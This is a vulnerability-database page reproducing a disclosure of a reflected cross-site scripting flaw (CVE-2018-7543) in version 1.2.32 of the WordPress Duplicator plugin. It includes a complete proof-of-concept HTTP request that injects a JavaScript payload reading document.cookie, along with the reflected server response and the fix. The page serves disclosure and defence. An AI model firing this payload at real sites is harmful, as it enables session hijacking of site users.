Vulners
Lucene search
WordPress Duplicator 1.2.32 Cross Site Scripting
🗓️ 15 Mar 2018 00:00:00Reported by Stefan BroederType 
packetstorm🔗 packetstormsecurity.com👁 37 Views
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | WordPress Duplicator 1.2.32 Plugin - Cross-Site Scripting Vulnerability | 16 Mar 201800:00 | – | zdt |
 | WordPress Duplicator Plugin Cross-Site Scripting Vulnerability | 19 Mar 201800:00 | – | cnvd |
 | CVE-2018-7543 | 26 Mar 201818:00 | – | cve |
 | CVE-2018-7543 | 26 Mar 201818:00 | – | cvelist |
 | WordPress Plugin Duplicator 1.2.32 - Cross-Site Scripting | 15 Mar 201800:00 | – | exploitdb |
 | EUVD-2018-19270 | 7 Oct 202500:30 | – | euvd |
 | WordPress Plugin Duplicator 1.2.32 - Cross-Site Scripting | 15 Mar 201800:00 | – | exploitpack |
 | CVE-2018-7543 | 26 Mar 201818:29 | – | nvd |
 | WordPress Duplicator plugin <=1.2.32 - Cross-Site Scripting (XSS) vulnerability | 28 Mar 201800:00 | – | patchstack |
 | Cross site scripting | 26 Mar 201818:29 | – | prion |
10
`# Exploit Title : Duplicator Wordpress Migration Plugin Reflected Cross Site Scripting (XSS)
# Date: 25-02-2018
# Exploit Author : Stefan Broeder
# Contact : https://twitter.com/stefanbroeder
# Vendor Homepage: https://snapcreek.com/
# Software Link: https://wordpress.org/plugins/duplicator/
# Version: 1.2.32
# CVE : CVE-2018-7543
# Category : webapps
Description
===========
Duplicator is a wordpress plugin with more than 1 million of active installations. Version 1.2.32 (and possibly previous versionss) are affected by a Reflected XSS vulnerability.
Vulnerable part of code
=======================
File: duplicator/installer/build/view.step4.php:254 allows direct injection of $_POST variable 'json'.
Impact
======
Arbitrary JavaScript code can be run on browser side if a user is tricked to click over a link or browse a URL under the attacker control.
Proof of Concept
============
In order to exploit this vulnerability, an attacker has to send the following request to the server:
POST /wp-content/plugins/duplicator/installer/build/view.step4.php HTTP/1.1
Host: <hostname>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: wordpress_5c016e8f0f95f039102cbe8366c5c7f3=wp%7C1518599198<omissis>
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
json='a';};document.write(alert(document.cookie));MyViewModel%3dfunction(){this.status%3d''
The server replies as reported below:
HTTP/1.1 200 OK
Date: Mon, 12 Feb 2018 14:15:28 GMT
Server: Apache/2.4.29 (Debian)
Vary: Accept-Encoding
Content-Length: 10224
Connection: close
Content-Type: text/html; charset=UTF-8
...
<script>
MyViewModel = function() {
this.status = 'a';};document.write(alert(document.cookie));MyViewModel=function(){this.status='';
var errorCount = this.status.step2.query_errs || 0;
(errorCount >= 1 )
? $('#dup-step3-install-report-count').css('color', '#BE2323')
: $('#dup-step3-install-report-count').css('color', '#197713')
};
ko.applyBindings(new MyViewModel());
</script>
Solution
========
Update to version 1.2.33
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Mar 2018 00:00Current
6.4Medium risk
Vulners AI Score6.4
EPSS0.01419